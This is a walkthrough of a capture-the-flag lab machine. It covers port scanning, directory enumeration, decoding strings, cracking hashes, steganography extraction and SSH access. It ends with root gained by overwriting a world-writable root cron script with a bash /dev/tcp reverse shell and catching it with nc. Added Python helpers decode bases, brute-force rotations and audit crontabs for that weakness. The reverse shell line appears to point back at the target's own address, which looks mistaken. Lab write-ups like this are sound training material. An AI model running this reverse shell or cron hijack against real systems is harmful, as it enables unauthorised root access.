easy peasy

Get the IP of the machine and ping it to see whether it is live. Then scan all the open ports using Nmap; for this, try the command below.

nmap 10.10.219.249 -p- -T4

-p- scans all ports.

-A enables an aggressive scan (the command above uses -T4 instead, which only selects a faster timing template).

We get three open ports, right? The 1st is 80, the 2nd is 6498 and the 3rd is 65524.

Now we scan these open ports with Nmap to see the service versions.

nmap -sV 10.10.219.249 -p80,6498,65524

-sV probes the open ports to find the service versions.

-p scans only the specified ports.

We get “Apache” and nginx version 1.16.1.

Now we run Gobuster for directory busting, using the following command with a wordlist.

gobuster dir -u 10.10.219.249 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster is used for directory busting.

dir uses directory/file enumeration mode.

-w sets the path to the wordlist (set it to - to read from STDIN).

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt is the path to the wordlist (in this case, directory-list-2.3-medium.txt) used for the directory busting.

We get the “hidden” directory and robots.txt.

Now that we have the hidden directory, we can start the next Gobuster run from it; for this we just append the directory to the IP in the URL.

We got it! It's named “whatever”.

Now we'll take a look at it by putting the whole URL into the browser, like below.

10.10.219.249/hidden/whatever/

We get a picture. Right-click on the page and pick View Page Source from the menu. Nothing in it? No, it's there.

It contains “==”, the base64 padding, so we know it's base64 encoded. We use a base64 decoder to see what it holds!

We got our 1st flag. Congratulations!

Now we use robots.txt, adding the open port as well, like below.

10.10.219.249:65524/robots.txt

Woohoo! We got the hash. Now, to identify it, we use hash-identifier.

Now we know it's “md5”. It's time to crack the hash using https://md5hashing.net/. Here's our 2nd flag.

Now we're on the hunt for the 3rd flag and a hidden directory as well! Let's keep hunting.

We have the IP and the open port, 65524. Let's see what it has for us.

We have Apache's default page hosted here. Now guess what we do? Yes, you got it: View Page Source.

This is what we find here: a base-encoded string. Now we have to find out which base it is. Here is a list of bases; try these decoders one by one.

Base16

Base32

Base36

Base58

Base62

Base64

Base64Url

Base85

Ascii85

Base91

Base92

This is base62. Yes, we nailed it!
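Instead of pasting the string into each online decoder in turn, the trial can be scripted. The following Python is an added example, not code from the original writeup: it tries the bases listed above (base36, base91 and base92 are left out) plus plain binary, and keeps only the decodings that produce printable text, so the same function also handles the base64 string from the 1st flag and the binary password found later in the room. Base62 and base58 have no single standard, so the alphabets used here (0-9A-Za-z for base62, the Bitcoin alphabet for base58) are assumptions; the sample strings are constructed.

```python
"""Try several text-to-bytes decodings on a candidate string and report
which ones yield readable output (added example, not from the writeup)."""
import base64
import binascii
import string

# Assumed alphabets: base62 and base58 have no RFC; these are the conventions
# most online decoders use (base62 = 0-9A-Za-z, base58 = Bitcoin alphabet).
BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def decode_big_int(text: str, alphabet: str) -> bytes:
    """Positional decode: read the string as one big integer in the given
    alphabet and return its big-endian bytes. Leading 'zero' digits become
    leading zero bytes (the base58 convention)."""
    base = len(alphabet)
    value = 0
    for ch in text:
        value = value * base + alphabet.index(ch)  # ValueError on a foreign char
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading = len(text) - len(text.lstrip(alphabet[0]))
    return b"\x00" * leading + body


def encode_big_int(data: bytes, alphabet: str) -> str:
    """Inverse of decode_big_int; handy for building test vectors."""
    base = len(alphabet)
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, base)
        digits.append(alphabet[rem])
    leading = len(data) - len(data.lstrip(b"\x00"))
    return alphabet[0] * leading + "".join(reversed(digits))


# Each decoder raises ValueError (or its subclass binascii.Error) on bad input.
DECODERS = {
    "binary": lambda s: bytes(int(chunk, 2) for chunk in s.split()),
    "base16": lambda s: base64.b16decode(s.upper()),
    "base32": lambda s: base64.b32decode(s.upper()),
    "base64": lambda s: base64.b64decode(s, validate=True),
    "base64url": lambda s: base64.urlsafe_b64decode(s),
    "base85": lambda s: base64.b85decode(s),
    "ascii85": lambda s: base64.a85decode(s),
    "base58": lambda s: decode_big_int(s, BASE58_ALPHABET),
    "base62": lambda s: decode_big_int(s, BASE62_ALPHABET),
}


def looks_readable(data: bytes) -> bool:
    """Heuristic: a decoding is plausible if it is non-empty printable ASCII."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return bool(text) and all(ch in string.printable for ch in text)


def try_all(candidate: str) -> dict:
    """Return {decoder_name: decoded_text} for every decoder giving readable output."""
    hits = {}
    for name, fn in DECODERS.items():
        try:
            out = fn(candidate)
        except (ValueError, binascii.Error):
            continue
        if looks_readable(out):
            hits[name] = out.decode("ascii")
    return hits


if __name__ == "__main__":
    # Constructed samples: base62 "4oz" is "Hi", "SGVsbG8=" is base64 "Hello".
    for sample in ("4oz", "SGVsbG8=", "01001000 01101001"):
        print(sample, "->", try_all(sample))
```

A string that decodes "readably" under two bases (base64 and base64url share an alphabet, for instance) is reported under both, which is the point: the heuristic narrows the list, and the human still picks the one that makes sense.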

You've got the hidden dir.

Scroll down the same page source and we get our 3rd flag.

For the next task, we need to go to the hidden path we found earlier.

When we go to the hidden path, we find another picture, which looks mysterious, doesn't it?

Let's check the page source.

Look, we found something. Let's crack this hash.

To crack it, they gave us a hint. Let's read the hint.

The hint tells us to use john to crack this hash with the specific wordlist that is provided.

Download the file and save the hash into a text file.

john --wordlist=easypeasy.txt --format=gost <filename.txt>

john John the Ripper (JTR) is a free, open-source software tool used by hackers, both ethical and otherwise, for password cracking. It is typically used in UNIX/Linux and Mac OS X environments, where it can detect weak passwords.

By using this, we get the password.

And this is the answer to the following task.

While finding the hash, we noticed that this image name looks suspicious.

Let's extract this image. To do that, first we need to download it.

After downloading, extract it using this command.

steghide extract -sf <filename>

Steghide Steghide is a steganography program that can hide data in various kinds of image and audio files.

extract This command extracts the embedded data.

-sf Specify the stego file (the file that contains embedded data).

If you don't have steghide, simply install it with this command.

sudo apt install steghide

While extracting the image, it asks us to enter the passphrase.

We already found it by cracking the hash with john.

It extracts the data and stores it in the secrettext.txt file.

Let's open the file and read the data.

It gives us a username and password.

First, convert this binary password into plain text.

To do this, we use the CyberChef website.

Here we go, we get the password to log in to the machine via SSH.

We have the username and now the password, so let's try to sign in on the SSH port that is given.

User flag:

ssh boring@10.10.9.236 -p 6498

-p specifies the port on which the SSH service is listening.

In this case port 6498 is open.

Amazing! We made it.

Now we need to find the user flag for the next task.

We find the user flag simply by running the ls command. But it also tells us that it seems to be rotated.

Worry not, we use CyberChef again to solve this.

Here we go, we found the user flag.
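What CyberChef's ROT13 brute force does can be written in a few lines. The following Python is an added example, not part of the original writeup: it applies every one of the 25 possible letter rotations, leaves digits, braces and punctuation untouched, and ranks the candidates by how many known words they reveal. The tiny word list and the sample string are constructed for the demo; a real run would load a system dictionary.

```python
"""Undo an unknown Caesar/ROT rotation: try all 25 shifts and rank them by
how many dictionary words each one reveals (added example, not from the writeup)."""
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase

# Constructed mini dictionary for scoring; swap in /usr/share/dict/words for real use.
COMMON_WORDS = {"the", "flag", "hello", "world", "user", "root", "password", "is"}


def rot(text: str, shift: int) -> str:
    """Rotate letters forward by `shift` places; non-letters pass through unchanged."""
    table = str.maketrans(
        LOWER + UPPER,
        LOWER[shift:] + LOWER[:shift] + UPPER[shift:] + UPPER[:shift],
    )
    return text.translate(table)


def all_rotations(text: str) -> dict:
    """Map each shift 1..25 to the text it produces (shift n undoes a ROT of 26-n)."""
    return {n: rot(text, n) for n in range(1, 26)}


def score(candidate: str, words=COMMON_WORDS) -> int:
    """Count dictionary words in the candidate, ignoring case and punctuation."""
    cleaned = candidate.lower().translate(str.maketrans("", "", string.punctuation))
    return sum(1 for w in cleaned.split() if w in words)


def best_rotation(text: str, words=COMMON_WORDS):
    """Return (shift, plaintext) for the shift whose output scores highest."""
    shift, plain = max(all_rotations(text).items(), key=lambda kv: score(kv[1], words))
    return shift, plain


if __name__ == "__main__":
    sample = "Uryyb Jbeyq"  # constructed: ROT13 of "Hello World"
    for n, candidate in all_rotations(sample).items():
        print(f"shift {n:2d}: {candidate}")
    print("best guess:", best_rotation(sample))
```

For a flag made of random characters the word score says nothing, so print all 25 rows as the block does and look for the one that reads as a flag; the scoring only helps when the rotated text contains real words.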

Root flag:

For the root flag we need root privileges.

For root privileges, we look at the cron jobs, which can help us get root access.

To do this, run the following command.

cat /etc/crontab

This shows us one cron job which actually runs a script.

Let's find it and modify the script to get root privileges.

Follow the path that is given.

When we go to that path we find just a directory.

By running ls -la, we find the cron job script.

Let's modify it by simply putting in the following script.

bash -i >& /dev/tcp/10.10.219.249/<port> 0>&1

Save the file and give it executable permission.

Now listen on the port.

nc -lvnp <port>

We successfully get a root shell.
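The weakness used here is a root cron job that runs a script other users can edit, which is exactly what a hardening check on a box should catch before anyone else does. The following Python is an added example, not code from the original writeup: it parses system-crontab lines in the /etc/crontab format (time fields, user, command), and for every job owned by root reports any referenced absolute path that group or world can write, whether that is the interpreter or the script. The crontab text and the temporary scripts in run_demo are constructed for the demo.

```python
"""Audit /etc/crontab-style text for root jobs whose script or interpreter is
writable by non-owners (added example, not from the writeup)."""
import os
import shlex
import stat
import tempfile


def parse_system_crontab(text: str):
    """Return (user, command) pairs. Lines are
    'minute hour day month weekday user command' or '@reboot user command';
    comments, blank lines and VAR=value assignments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:          # environment assignment such as PATH=...
            continue
        n = 2 if line.startswith("@") else 6  # fields that precede the command
        fields = line.split(None, n)
        if len(fields) <= n:
            continue
        jobs.append((fields[n - 1], fields[n]))
    return jobs


def writable_by_non_owner(path: str) -> bool:
    """True if the group or world write bit is set on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(text: str):
    """Return (command, offending_path) for each root job whose command references an
    existing absolute path that non-owners can modify."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for token in shlex.split(command):
            if token.startswith("/") and os.path.isfile(token) and writable_by_non_owner(token):
                findings.append((command, token))
    return findings


def run_demo():
    """Constructed scenario: two scripts in a temp dir, one world-writable, referenced
    from a constructed crontab. Returns the audit findings."""
    tmp = tempfile.mkdtemp()
    weak = os.path.join(tmp, "backup.sh")
    safe = os.path.join(tmp, "rotate.sh")
    for path in (weak, safe):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho placeholder\n")
    os.chmod(weak, 0o777)  # anyone can edit it, so a root job running it is a takeover path
    os.chmod(safe, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "# m h dom mon dow user  command\n"
        f"* * * * * root bash {weak} >/dev/null 2>&1\n"
        f"0 3 * * * root {safe}\n"
        f"@reboot   www-data {weak}\n"
    )
    return audit(crontab)


if __name__ == "__main__":
    for command, path in run_demo():
        print(f"root job '{command}' runs group/world-writable file {path}")
```

Run it against the real file with audit(open("/etc/crontab").read()); on a hardened host it returns an empty list. The fix for a finding is to make the script owned by root with mode 0755 (or stricter), and the same check is worth extending to the files under /etc/cron.d and the directory that holds the script, since a writable parent directory lets the file be replaced.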

Now find the root flag.

As before, by running ls -la, we find the root flag.

Just cat the .root.txt file and we get the root flag.

Congratulations!!! We've completed the room.
